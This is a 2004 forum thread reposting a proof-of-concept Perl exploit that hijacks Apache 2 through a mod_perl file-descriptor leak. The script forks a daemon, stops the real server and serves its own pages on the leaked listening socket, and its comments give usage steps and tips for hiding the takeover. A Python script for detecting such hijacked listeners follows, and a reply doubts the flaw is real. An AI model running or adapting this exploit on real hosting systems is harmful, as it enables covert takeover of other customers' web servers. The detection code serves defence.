Forums: Apache 2 Daemon Hijacking Via Mod_perl Exploit - Forums


Apache 2 Daemon Hijacking Via Mod_perl Exploit File Descriptor Leak

#1 GaLiaRePt (Private First Class, Group: Members, Posts: 77, Joined: 30-July 03)

Posted 22 January 2004 - 02:07 PM

Apache 2 Daemon HiJacking via mod_perl File Descriptor Leak Exploit

Date: 2004-01-22
Author : Steve Grubb <linux_4ever@yahoo.com>
Download : http://www.security-..._perl-sploit.pl

#!/usr/bin/perl
###############################################################################
#
#Hijacking Apache 2 via mod_perl
#
#The technique is simple.
#
#1) Fork and daemonize yourself.
#2) Do something evil to apache.
#3) Select on the leaked descriptor and start serving pages.
#
#At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assumed
#that paying customers can ftp anything they want into their website and mod_perl scripting is enabled.
#
#cp mod_perl-sploit.pl /var/www/perl
#
#lynx http://localhost/perl/mod_perl-sploit.pl
#
#Now, ps -ef to see how things are going:
#
#apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
#
#So far, so good...
#
#lynx http://localhost
#
#And you should see the "You're owned" message. The really sneaky part is that 'ps -ef'
#gives only a minor hint that apache has been replaced. The only way to tell something is
#abnormal is that there's only 2 apache instances when a normal Mandrake server in its
#default configuration shows 5 instances. But, forking off a few decoy children should
#be easy enough to do.
#
#This was tested on a fully updated Mandrake 9.2 system.
#
###############################################################################

use POSIX qw(setsid);

my ($rout, $nfound);

if (!defined(my $pid = fork)) {
        print "Content-Type: text/html\n\n";
        print "cannot fork: $!";
        exit 1;
} elsif ($pid) { # This is the parent: answer the request, then stop the real server
        sleep(1);
        print "Content-Type: text/html\n\n";
        print "<html><body>Exploit installed</body></html>";
        system '/usr/sbin/httpd2 -k stop';
        sleep(2);
        exit 0;
}

# This is the child: detach from the worker and keep the inherited listener
setsid;
sleep(2);
my $leak = 4;                 # descriptor number of the leaked listening socket
open(Server, "+<&$leak");     # reopen that descriptor as a Perl filehandle
while (1) {
        my $rin = '';
        vec($rin,fileno(Server),1) = 1;
        $nfound = select($rout = $rin, undef, undef, undef);  # wait for a pending connection
        if (accept(Client,Server) ) {
                print Client "HTTP/1.0 200 OK\n";
                print Client "Content-Length: 40\n";
                print Client "Content-Type: text/html\n\n";
                print Client "<html><body>";
                print Client "You're owned.";
                print Client "</body></html>";
                close Client;
        }
}


:ph34r:
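A defender-side check for the state the advisory describes (a process that still holds Apache's listening socket although it is not the configured master or one of its children), added here as an example; it is not part of the original advisory or this post. It assumes Linux /proc, that the legitimate master pid is known from Apache's pidfile, and uses constructed sample data; the live reader snapshot_procs() needs root to see other users' descriptors.

```python
import os
import re
SOCK_RE = re.compile(r"socket:\[(\d+)\]")

def listening_inodes(net_tcp_text, port):
    """Socket inodes in LISTEN state (st == 0A) on `port`, from /proc/net/tcp text."""
    inodes = set()
    for line in net_tcp_text.splitlines()[1:]:
        f = line.split()
        if len(f) >= 10 and f[3] == "0A" and int(f[1].rsplit(":", 1)[1], 16) == port:
            inodes.add(int(f[9]))
    return inodes

def find_hijackers(procs, listeners, master_pid):
    """procs: {pid: (ppid, comm, [fd link targets])}.  A process holding a listener
    inode must be the master (pid from the pidfile) or its direct child; anything
    else, e.g. a daemon reparented to init after 'httpd -k stop', is reported."""
    flagged = []
    for pid, (ppid, comm, fds) in sorted(procs.items()):
        held = {int(m.group(1)) for m in map(SOCK_RE.match, fds) if m}
        if held & listeners and pid != master_pid and ppid != master_pid:
            flagged.append((pid, ppid, comm))
    return flagged

def snapshot_procs():
    """Live process table from /proc (Linux only; root needed to see all descriptors)."""
    procs = {}
    for d in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{d}/stat") as fh:
                stat = fh.read()
            fds = [os.readlink(f"/proc/{d}/fd/{n}") for n in os.listdir(f"/proc/{d}/fd")]
        except OSError:
            continue  # process exited, or its fd table is not readable by us
        comm = stat[stat.index("(") + 1:stat.rindex(")")]
        ppid = int(stat[stat.rindex(")") + 2:].split()[1])  # field after the state letter
        procs[int(d)] = (ppid, comm, fds)
    return procs

# Constructed sample: 2640 is the master, 2652 its worker; 3107 kept the listener and now hangs off init.
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 7001 1 0000000000000000 100 0 0 10 0\n"
)
SAMPLE_PROCS = {
    2640: (1, "httpd2", ["socket:[7001]", "/var/log/httpd/error_log"]),
    2652: (2640, "httpd2", ["socket:[7001]", "socket:[7002]"]),
    3107: (1, "httpd2", ["socket:[7001]"]),
    900: (1, "sshd", ["socket:[5100]"]),
}
```

On a live host, call find_hijackers(snapshot_procs(), listening_inodes(open("/proc/net/tcp").read(), 80), master_pid) with master_pid read from the pidfile; an empty list means only the master and its children hold the listener.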

#2 JeiAr (Corporal, Group: Specialist, Posts: 199, Joined: 21-December 03)

Posted 22 January 2004 - 02:53 PM

If you read the discussion about this on BugTraq you will see that it really isn't a vuln at all.

Best Regards